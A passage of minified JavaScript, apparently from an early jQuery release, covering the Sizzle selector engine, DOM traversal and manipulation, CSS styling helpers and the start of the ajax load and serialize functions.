d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});A.attachEvent&&!A.addEventListener&&A.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});(function(){function a(g){for(var h="",l,m=0;g[m];m++){l=g[m];if(l.nodeType===3||l.nodeType===4)h+=l.nodeValue;else if(l.nodeType!==8)h+=a(l.childNodes)}return h}function b(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=l;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}m[q]=y}}}function d(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=l;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(k.filter(h,[t]).length>0){y=t;break}}t=t[g]}m[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,e=0,j=Object.prototype.toString,i=false,o=true;[0,0].sort(function(){o=false;return 0});var k=function(g,h,l,m){l=l||[];var q=h=h||s;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||typeof g!=="string")return l;for(var p=[],v,t,y,S,H=true,M=x(h),I=g;(f.exec(""),v=f.exec(I))!==null;){I=v[3];p.push(v[1]);if(v[2]){S=v[3];break}}if(p.length>1&&r.exec(g))if(p.length===2&&n.relative[p[0]])t=ga(p[0]+p[1],h);else for(t=n.relative[p[0]]?[h]:k(p.shift(),h);p.length;){g=p.shift();if(n.relative[g])g+=p.shift();t=ga(g,t)}else{if(!m&&p.length>1&&h.nodeType===9&&!M&&n.match.ID.test(p[0])&&!n.match.ID.test(p[p.length-1])){v=k.find(p.shift(),h,M);h=v.expr?k.filter(v.expr,v.set)[0]:v.set[0]}if(h){v=m?{expr:p.pop(),set:z(m)}:k.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=v.expr?k.filter(v.expr,v.set):v.set;if(p.length>0)y=z(t);else H=false;for(;p.length;){var D=p.pop();v=D;if(n.relative[D])v=p.pop();else D="";if(v==null)v=h;n.relative[D](y,v,M)}}else y=[]}y||(y=t);y||k.error(D||g);if(j.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))l.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&y[g].nodeType===1&&l.push(t[g]);else l.push.apply(l,y);else z(y,l);if(S){k(S,q,l,m);k.uniqueSort(l)}return l};k.uniqueSort=function(g){if(B){i=o;g.sort(B);if(i)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};k.matches=function(g,h){return k(g,null,null,h)};k.find=function(g,h,l){var m,q;if(!g)return[];for(var p=0,v=n.order.length;p<v;p++){var t=n.order[p];if(q=n.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");m=n.find[t](q,h,l);if(m!=null){g=g.replace(n.match[t],"");break}}}}m||(m=h.getElementsByTagName("*"));return{set:m,expr:g}};k.filter=function(g,h,l,m){for(var q=g,p=[],v=h,t,y,S=h&&h[0]&&x(h[0]);g&&h.length;){for(var H in n.filter)if((t=n.leftMatch[H].exec(g))!=null&&t[2]){var M=n.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length-
1)!=="\\"){if(v===p)p=[];if(n.preFilter[H])if(t=n.preFilter[H](t,v,l,p,m,S)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=v[U])!=null;U++)if(D){I=M(D,t,U,v);var Ha=m^!!I;if(l&&I!=null)if(Ha)y=true;else v[U]=false;else if(Ha){p.push(D);y=true}}if(I!==w){l||(v=p);g=g.replace(n.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)k.error(g);else break;q=g}return v};k.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var n=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}},relative:{"+":function(g,h){var l=typeof h==="string",m=l&&!/\W/.test(h);l=l&&!m;if(m)h=h.toLowerCase();m=0;for(var q=g.length,p;m<q;m++)if(p=g[m]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[m]=l||p&&p.nodeName.toLowerCase()===h?p||false:p===h}l&&k.filter(h,g,true)},">":function(g,h){var l=typeof h==="string";if(l&&!/\W/.test(h)){h=h.toLowerCase();for(var m=0,q=g.length;m<q;m++){var p=g[m];if(p){l=p.parentNode;g[m]=l.nodeName.toLowerCase()===h?l:false}}}else{m=0;for(q=g.length;m<q;m++)if(p=g[m])g[m]=l?p.parentNode:p.parentNode===h;l&&k.filter(h,g,true)}},"":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("parentNode",h,m,g,p,l)},"~":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,m,g,p,l)}},find:{ID:function(g,h,l){if(typeof h.getElementById!=="undefined"&&!l)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var l=[];h=h.getElementsByName(g[1]);for(var m=0,q=h.length;m<q;m++)h[m].getAttribute("name")===g[1]&&l.push(h[m]);return l.length===0?null:l}},TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,l,m,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var v;(v=h[p])!=null;p++)if(v)if(q^(v.className&&(" "+v.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))l||m.push(v);else if(l)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()},CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,l,m,q,p){h=g[1].replace(/\\/g,"");if(!p&&n.attrMap[h])g[1]=n.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,l,m,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=k(g[3],null,null,h);else{g=k.filter(g[3],h,l,true^q);l||m.push.apply(m,g);return false}else if(n.match.POS.test(g[0])||n.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,l){return!!k(l[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)},text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}},setFilters:{first:function(g,h){return h===0},last:function(g,h,l,m){return h===m.length-1},even:function(g,h){return h%2===0},odd:function(g,h){return h%2===1},lt:function(g,h,l){return h<l[3]-0},gt:function(g,h,l){return h>l[3]-0},nth:function(g,h,l){return l[3]-0===h},eq:function(g,h,l){return l[3]-0===h}},filter:{PSEUDO:function(g,h,l,m){var q=h[1],p=n.filters[q];if(p)return p(g,l,h,m);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h=h[3];l=0;for(m=h.length;l<m;l++)if(h[l]===g)return false;return true}else k.error("Syntax error, unrecognized expression: "+q)},CHILD:function(g,h){var l=h[1],m=g;switch(l){case"only":case"first":for(;m=m.previousSibling;)if(m.nodeType===1)return false;if(l==="first")return true;m=g;case"last":for(;m=m.nextSibling;)if(m.nodeType===1)return false;return true;case"nth":l=h[2];var q=h[3];if(l===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var v=0;for(m=p.firstChild;m;m=m.nextSibling)if(m.nodeType===1)m.nodeIndex=++v;p.sizcache=h}g=g.nodeIndex-q;return l===0?g===0:g%l===0&&g/l>=0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var l=h[1];g=n.attrHandle[l]?n.attrHandle[l](g):g[l]!=null?g[l]:g.getAttribute(l);l=g+"";var m=h[2];h=h[4];return g==null?m==="!=":m==="="?l===h:m==="*="?l.indexOf(h)>=0:m==="~="?(" "+l+" ").indexOf(h)>=0:!h?l&&g!==false:m==="!="?l!==h:m==="^="?l.indexOf(h)===0:m==="$="?l.substr(l.length-h.length)===h:m==="|="?l===h||l.substr(0,h.length+1)===h+"-":false},POS:function(g,h,l,m){var q=n.setFilters[h[2]];if(q)return q(g,l,h,m)}}},r=n.match.POS;for(var u in n.match){n.match[u]=new RegExp(n.match[u].source+/(?![^\[]*\])(?![^\(]*\))/.source);n.leftMatch[u]=new RegExp(/(^(?:.|\r|\n)*?)/.source+n.match[u].source.replace(/\\(\d+)/g,function(g,h){return"\\"+(h-0+1)}))}var z=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};try{Array.prototype.slice.call(s.documentElement.childNodes,0)}catch(C){z=function(g,h){h=h||[];if(j.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var l=0,m=g.length;l<m;l++)h.push(g[l]);else for(l=0;g[l];l++)h.push(g[l]);return h}}var B;if(s.documentElement.compareDocumentPosition)B=function(g,h){if(!g.compareDocumentPosition||!h.compareDocumentPosition){if(g==h)i=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===h?0:1;if(g===0)i=true;return g};else if("sourceIndex"in s.documentElement)B=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)i=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)i=true;return g};else if(s.createRange)B=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)i=true;return g.ownerDocument?-1:1}var l=g.ownerDocument.createRange(),m=h.ownerDocument.createRange();l.setStart(g,0);l.setEnd(g,0);m.setStart(h,0);m.setEnd(h,0);g=l.compareBoundaryPoints(Range.START_TO_END,m);if(g===0)i=true;return g};(function(){var g=s.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var l=s.documentElement;l.insertBefore(g,l.firstChild);if(s.getElementById(h)){n.find.ID=function(m,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(m[1]))?q.id===m[1]||typeof q.getAttributeNode!=="undefined"&&q.getAttributeNode("id").nodeValue===m[1]?[q]:w:[]};n.filter.ID=function(m,q){var p=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&p&&p.nodeValue===q}}l.removeChild(g);l=g=null})();(function(){var g=s.createElement("div");g.appendChild(s.createComment(""));if(g.getElementsByTagName("*").length>0)n.find.TAG=function(h,l){l=l.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var m=0;l[m];m++)l[m].nodeType===1&&h.push(l[m]);l=h}return l};g.innerHTML="<a href='#'></a>";if(g.firstChild&&typeof g.firstChild.getAttribute!=="undefined"&&g.firstChild.getAttribute("href")!=="#")n.attrHandle.href=function(h){return h.getAttribute("href",2)};g=null})();s.querySelectorAll&&function(){var g=k,h=s.createElement("div");h.innerHTML="<p class='TEST'></p>";if(!(h.querySelectorAll&&h.querySelectorAll(".TEST").length===0)){k=function(m,q,p,v){q=q||s;if(!v&&q.nodeType===9&&!x(q))try{return z(q.querySelectorAll(m),p)}catch(t){}return g(m,q,p,v)};for(var l in g)k[l]=g[l];h=null}}();(function(){var g=s.createElement("div");g.innerHTML="<div class='test e'></div><div class='test'></div>";if(!(!g.getElementsByClassName||g.getElementsByClassName("e").length===0)){g.lastChild.className="e";if(g.getElementsByClassName("e").length!==1){n.order.splice(1,0,"CLASS");n.find.CLASS=function(h,l,m){if(typeof l.getElementsByClassName!=="undefined"&&!m)return l.getElementsByClassName(h[1])};g=null}}})();var E=s.compareDocumentPosition?function(g,h){return!!(g.compareDocumentPosition(h)&16)}:function(g,h){return g!==h&&(g.contains?g.contains(h):true)},x=function(g){return(g=(g?g.ownerDocument||g:0).documentElement)?g.nodeName!=="HTML":false},ga=function(g,h){var l=[],m="",q;for(h=h.nodeType?[h]:h;q=n.match.PSEUDO.exec(g);){m+=q[0];g=g.replace(n.match.PSEUDO,"")}g=n.relative[g]?g+"*":g;q=0;for(var p=h.length;q<p;q++)k(g,h[q],l);return k.filter(m,l)};c.find=k;c.expr=k.selectors;c.expr[":"]=c.expr.filters;c.unique=k.uniqueSort;c.text=a;c.isXMLDoc=x;c.contains=E})();var eb=/Until$/,fb=/^(?:parents|prevUntil|prevAll)/,gb=/,/;R=Array.prototype.slice;var Ia=function(a,b,d){if(c.isFunction(b))return c.grep(a,function(e,j){return!!b.call(e,j,e)===d});else if(b.nodeType)return c.grep(a,function(e){return e===b===d});else if(typeof b==="string"){var f=c.grep(a,function(e){return e.nodeType===1});if(Ua.test(b))return c.filter(b,f,!d);else b=c.filter(b,f)}return c.grep(a,function(e){return c.inArray(e,b)>=0===d})};c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,f=0,e=this.length;f<e;f++){d=b.length;c.find(a,this[f],b);if(f>0)for(var j=d;j<b.length;j++)for(var i=0;i<d;i++)if(b[i]===b[j]){b.splice(j--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,f=b.length;d<f;d++)if(c.contains(this,b[d]))return true})},not:function(a){return this.pushStack(Ia(this,a,false),"not",a)},filter:function(a){return this.pushStack(Ia(this,a,true),"filter",a)},is:function(a){return!!a&&c.filter(a,this).length>0},closest:function(a,b){if(c.isArray(a)){var d=[],f=this[0],e,j={},i;if(f&&a.length){e=0;for(var o=a.length;e<o;e++){i=a[e];j[i]||(j[i]=c.expr.match.POS.test(i)?c(i,b||this.context):i)}for(;f&&f.ownerDocument&&f!==b;){for(i in j){e=j[i];if(e.jquery?e.index(f)>-1:c(f).is(e)){d.push({selector:i,elem:f});delete j[i]}}f=f.parentNode}}return d}var k=c.expr.match.POS.test(a)?c(a,b||this.context):null;return this.map(function(n,r){for(;r&&r.ownerDocument&&r!==b;){if(k?k.index(r)>-1:c(r).is(a))return r;r=r.parentNode}return null})},index:function(a){if(!a||typeof a==="string")return c.inArray(this[0],a?c(a):this.parent().children());return c.inArray(a.jquery?a[0]:a,this)},add:function(a,b){a=typeof a==="string"?c(a,b||this.context):c.makeArray(a);b=c.merge(this.get(),a);return this.pushStack(qa(a[0])||qa(b[0])?b:c.unique(b))},andSelf:function(){return this.add(this.prevObject)}});c.each({parent:function(a){return(a=a.parentNode)&&a.nodeType!==11?a:null},parents:function(a){return c.dir(a,"parentNode")},parentsUntil:function(a,b,d){return c.dir(a,"parentNode",d)},next:function(a){return c.nth(a,2,"nextSibling")},prev:function(a){return c.nth(a,2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,b){c.fn[a]=function(d,f){var e=c.map(this,b,d);eb.test(a)||(f=d);if(f&&typeof f==="string")e=c.filter(f,e);e=this.length>1?c.unique(e):e;if((this.length>1||gb.test(f))&&fb.test(a))e=e.reverse();return this.pushStack(e,a,R.call(arguments).join(","))}});c.extend({filter:function(a,b,d){if(d)a=":not("+a+")";return c.find.matches(a,b)},dir:function(a,b,d){var f=[];for(a=a[b];a&&a.nodeType!==9&&(d===w||a.nodeType!==1||!c(a).is(d));){a.nodeType===1&&f.push(a);a=a[b]}return f},nth:function(a,b,d){b=b||1;for(var f=0;a;a=a[d])if(a.nodeType===1&&++f===b)break;return a},sibling:function(a,b){for(var d=[];a;a=a.nextSibling)a.nodeType===1&&a!==b&&d.push(a);return d}});var Ja=/ jQuery\d+="(?:\d+|null)"/g,V=/^\s+/,Ka=/(<([\w:]+)[^>]*?)\/>/g,hb=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,La=/<([\w:]+)/,ib=/<tbody/i,jb=/<|&#?\w+;/,ta=/<script|<object|<embed|<option|<style/i,ua=/checked\s*(?:[^=]|=\s*.checked.)/i,Ma=function(a,b,d){return hb.test(d)?a:b+"></"+d+">"},F={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};F.optgroup=F.option;F.tbody=F.tfoot=F.colgroup=F.caption=F.thead;F.th=F.td;if(!c.support.htmlSerialize)F._default=[1,"div<div>","</div>"];c.fn.extend({text:function(a){if(c.isFunction(a))return this.each(function(b){var d=c(this);d.text(a.call(this,b,d.text()))});if(typeof a!=="object"&&a!==w)return this.empty().append((this[0]&&this[0].ownerDocument||s).createTextNode(a));return c.text(this)},wrapAll:function(a){if(c.isFunction(a))return this.each(function(d){c(this).wrapAll(a.call(this,d))});if(this[0]){var b=c(a,this[0].ownerDocument).eq(0).clone(true);this[0].parentNode&&b.insertBefore(this[0]);b.map(function(){for(var d=this;d.firstChild&&d.firstChild.nodeType===1;)d=d.firstChild;return d}).append(this)}return this},wrapInner:function(a){if(c.isFunction(a))return this.each(function(b){c(this).wrapInner(a.call(this,b))});return this.each(function(){var b=c(this),d=b.contents();d.length?d.wrapAll(a):b.append(a)})},wrap:function(a){return this.each(function(){c(this).wrapAll(a)})},unwrap:function(){return this.parent().each(function(){c.nodeName(this,"body")||c(this).replaceWith(this.childNodes)}).end()},append:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.appendChild(a)})},prepend:function(){return this.domManip(arguments,true,function(a){this.nodeType===1&&this.insertBefore(a,this.firstChild)})},before:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this)});else if(arguments.length){var a=c(arguments[0]);a.push.apply(a,this.toArray());return this.pushStack(a,"before",arguments)}},after:function(){if(this[0]&&this[0].parentNode)return this.domManip(arguments,false,function(b){this.parentNode.insertBefore(b,this.nextSibling)});else if(arguments.length){var a=this.pushStack(this,"after",arguments);a.push.apply(a,c(arguments[0]).toArray());return a}},remove:function(a,b){for(var d=0,f;(f=this[d])!=null;d++)if(!a||c.filter(a,[f]).length){if(!b&&f.nodeType===1){c.cleanData(f.getElementsByTagName("*"));c.cleanData([f])}f.parentNode&&f.parentNode.removeChild(f)}return this},empty:function(){for(var a=0,b;(b=this[a])!=null;a++)for(b.nodeType===1&&c.cleanData(b.getElementsByTagName("*"));b.firstChild;)b.removeChild(b.firstChild);return this},clone:function(a){var b=this.map(function(){if(!c.support.noCloneEvent&&!c.isXMLDoc(this)){var d=this.outerHTML,f=this.ownerDocument;if(!d){d=f.createElement("div");d.appendChild(this.cloneNode(true));d=d.innerHTML}return c.clean([d.replace(Ja,"").replace(/=([^="'>\s]+\/)>/g,'="$1">').replace(V,"")],f)[0]}else return this.cloneNode(true)});if(a===true){ra(this,b);ra(this.find("*"),b.find("*"))}return b},html:function(a){if(a===w)return this[0]&&this[0].nodeType===1?this[0].innerHTML.replace(Ja,""):null;else if(typeof a==="string"&&!ta.test(a)&&(c.support.leadingWhitespace||!V.test(a))&&!F[(La.exec(a)||["",""])[1].toLowerCase()]){a=a.replace(Ka,Ma);try{for(var b=0,d=this.length;b<d;b++)if(this[b].nodeType===1){c.cleanData(this[b].getElementsByTagName("*"));this[b].innerHTML=a}}catch(f){this.empty().append(a)}}else c.isFunction(a)?this.each(function(e){var j=c(this),i=j.html();j.empty().append(function(){return a.call(this,e,i)})}):this.empty().append(a);return this},replaceWith:function(a){if(this[0]&&this[0].parentNode){if(c.isFunction(a))return this.each(function(b){var d=c(this),f=d.html();d.replaceWith(a.call(this,b,f))});if(typeof a!=="string")a=c(a).detach();return this.each(function(){var b=this.nextSibling,d=this.parentNode;c(this).remove();b?c(b).before(a):c(d).append(a)})}else return this.pushStack(c(c.isFunction(a)?a():a),"replaceWith",a)},detach:function(a){return this.remove(a,true)},domManip:function(a,b,d){function f(u){return c.nodeName(u,"table")?u.getElementsByTagName("tbody")[0]||u.appendChild(u.ownerDocument.createElement("tbody")):u}var e,j,i=a[0],o=[],k;if(!c.support.checkClone&&arguments.length===3&&typeof i==="string"&&ua.test(i))return this.each(function(){c(this).domManip(a,b,d,true)});if(c.isFunction(i))return this.each(function(u){var z=c(this);a[0]=i.call(this,u,b?z.html():w);z.domManip(a,b,d)});if(this[0]){e=i&&i.parentNode;e=c.support.parentNode&&e&&e.nodeType===11&&e.childNodes.length===this.length?{fragment:e}:sa(a,this,o);k=e.fragment;if(j=k.childNodes.length===1?(k=k.firstChild):k.firstChild){b=b&&c.nodeName(j,"tr");for(var n=0,r=this.length;n<r;n++)d.call(b?f(this[n],j):this[n],n>0||e.cacheable||this.length>1?k.cloneNode(true):k)}o.length&&c.each(o,Qa)}return this}});c.fragments={};c.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(a,b){c.fn[a]=function(d){var f=[];d=c(d);var e=this.length===1&&this[0].parentNode;if(e&&e.nodeType===11&&e.childNodes.length===1&&d.length===1){d[b](this[0]);return this}else{e=0;for(var j=d.length;e<j;e++){var i=(e>0?this.clone(true):this).get();c.fn[b].apply(c(d[e]),i);f=f.concat(i)}return this.pushStack(f,a,d.selector)}}});c.extend({clean:function(a,b,d,f){b=b||s;if(typeof b.createElement==="undefined")b=b.ownerDocument||b[0]&&b[0].ownerDocument||s;for(var e=[],j=0,i;(i=a[j])!=null;j++){if(typeof i==="number")i+="";if(i){if(typeof i==="string"&&!jb.test(i))i=b.createTextNode(i);else if(typeof i==="string"){i=i.replace(Ka,Ma);var o=(La.exec(i)||["",""])[1].toLowerCase(),k=F[o]||F._default,n=k[0],r=b.createElement("div");for(r.innerHTML=k[1]+i+k[2];n--;)r=r.lastChild;if(!c.support.tbody){n=ib.test(i);o=o==="table"&&!n?r.firstChild&&r.firstChild.childNodes:k[1]==="<table>"&&!n?r.childNodes:[];for(k=o.length-1;k>=0;--k)c.nodeName(o[k],"tbody")&&!o[k].childNodes.length&&o[k].parentNode.removeChild(o[k])}!c.support.leadingWhitespace&&V.test(i)&&r.insertBefore(b.createTextNode(V.exec(i)[0]),r.firstChild);i=r.childNodes}if(i.nodeType)e.push(i);else e=c.merge(e,i)}}if(d)for(j=0;e[j];j++)if(f&&c.nodeName(e[j],"script")&&(!e[j].type||e[j].type.toLowerCase()==="text/javascript"))f.push(e[j].parentNode?e[j].parentNode.removeChild(e[j]):e[j]);else{e[j].nodeType===1&&e.splice.apply(e,[j+1,0].concat(c.makeArray(e[j].getElementsByTagName("script"))));d.appendChild(e[j])}return e},cleanData:function(a){for(var b,d,f=c.cache,e=c.event.special,j=c.support.deleteExpando,i=0,o;(o=a[i])!=null;i++)if(d=o[c.expando]){b=f[d];if(b.events)for(var k in b.events)e[k]?c.event.remove(o,k):Ca(o,k,b.handle);if(j)delete o[c.expando];else o.removeAttribute&&o.removeAttribute(c.expando);delete f[d]}}});var kb=/z-?index|font-?weight|opacity|zoom|line-?height/i,Na=/alpha\([^)]*\)/,Oa=/opacity=([^)]*)/,ha=/float/i,ia=/-([a-z])/ig,lb=/([A-Z])/g,mb=/^-?\d+(?:px)?$/i,nb=/^-?\d/,ob={position:"absolute",visibility:"hidden",display:"block"},pb=["Left","Right"],qb=["Top","Bottom"],rb=s.defaultView&&s.defaultView.getComputedStyle,Pa=c.support.cssFloat?"cssFloat":"styleFloat",ja=function(a,b){return b.toUpperCase()};c.fn.css=function(a,b){return X(this,a,b,true,function(d,f,e){if(e===w)return c.curCSS(d,f);if(typeof e==="number"&&!kb.test(f))e+="px";c.style(d,f,e)})};c.extend({style:function(a,b,d){if(!a||a.nodeType===3||a.nodeType===8)return w;if((b==="width"||b==="height")&&parseFloat(d)<0)d=w;var f=a.style||a,e=d!==w;if(!c.support.opacity&&b==="opacity"){if(e){f.zoom=1;b=parseInt(d,10)+""==="NaN"?"":"alpha(opacity="+d*100+")";a=f.filter||c.curCSS(a,"filter")||"";f.filter=Na.test(a)?a.replace(Na,b):b}return f.filter&&f.filter.indexOf("opacity=")>=0?parseFloat(Oa.exec(f.filter)[1])/100+"":""}if(ha.test(b))b=Pa;b=b.replace(ia,ja);if(e)f[b]=d;return f[b]},css:function(a,b,d,f){if(b==="width"||b==="height"){var e,j=b==="width"?pb:qb;function i(){e=b==="width"?a.offsetWidth:a.offsetHeight;f!=="border"&&c.each(j,function(){f||(e-=parseFloat(c.curCSS(a,"padding"+this,true))||0);if(f==="margin")e+=parseFloat(c.curCSS(a,"margin"+this,true))||0;else e-=parseFloat(c.curCSS(a,"border"+this+"Width",true))||0})}a.offsetWidth!==0?i():c.swap(a,ob,i);return Math.max(0,Math.round(e))}return c.curCSS(a,b,d)},curCSS:function(a,b,d){var f,e=a.style;if(!c.support.opacity&&b==="opacity"&&a.currentStyle){f=Oa.test(a.currentStyle.filter||"")?parseFloat(RegExp.$1)/100+"":"";return f===""?"1":f}if(ha.test(b))b=Pa;if(!d&&e&&e[b])f=e[b];else if(rb){if(ha.test(b))b="float";b=b.replace(lb,"-$1").toLowerCase();e=a.ownerDocument.defaultView;if(!e)return null;if(a=e.getComputedStyle(a,null))f=a.getPropertyValue(b);if(b==="opacity"&&f==="")f="1"}else if(a.currentStyle){d=b.replace(ia,ja);f=a.currentStyle[b]||a.currentStyle[d];if(!mb.test(f)&&nb.test(f)){b=e.left;var j=a.runtimeStyle.left;a.runtimeStyle.left=a.currentStyle.left;e.left=d==="fontSize"?"1em":f||0;f=e.pixelLeft+"px";e.left=b;a.runtimeStyle.left=j}}return f},swap:function(a,b,d){var f={};for(var e in b){f[e]=a.style[e];a.style[e]=b[e]}d.call(a);for(e in b)a.style[e]=f[e]}});if(c.expr&&c.expr.filters){c.expr.filters.hidden=function(a){var b=a.offsetWidth,d=a.offsetHeight,f=a.nodeName.toLowerCase()==="tr";return b===0&&d===0&&!f?true:b>0&&d>0&&!f?false:c.curCSS(a,"display")==="none"};c.expr.filters.visible=function(a){return!c.expr.filters.hidden(a)}}var sb=J(),tb=/<script(.|\s)*?\/script>/gi,ub=/select|textarea/i,vb=/color|date|datetime|email|hidden|month|number|password|range|search|tel|text|time|url|week/i,N=/=\?(&|$)/,ka=/\?/,wb=/(\?|&)_=.*?(&|$)/,xb=/^(\w+:)?\/\/([^\/?#]+)/,yb=/%20/g,zb=c.fn.load;c.fn.extend({load:function(a,b,d){if(typeof a!=="string")return zb.call(this,a);else if(!this.length)return this;var f=a.indexOf(" ");if(f>=0){var e=a.slice(f,a.length);a=a.slice(0,f)}f="GET";if(b)if(c.isFunction(b)){d=b;b=null}else if(typeof b==="object"){b=c.param(b,c.ajaxSettings.traditional);f="POST"}var j=this;c.ajax({url:a,type:f,dataType:"html",data:b,complete:function(i,o){if(o==="success"||o==="notmodified")j.html(e?c("<div />").append(i.responseText.replace(tb,"")).find(e):i.responseText);d&&j.each(d,[i.responseText,o,i])}});return this},serialize:function(){return c.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?c.makeArray(this.elements):this}).filter(function(){return 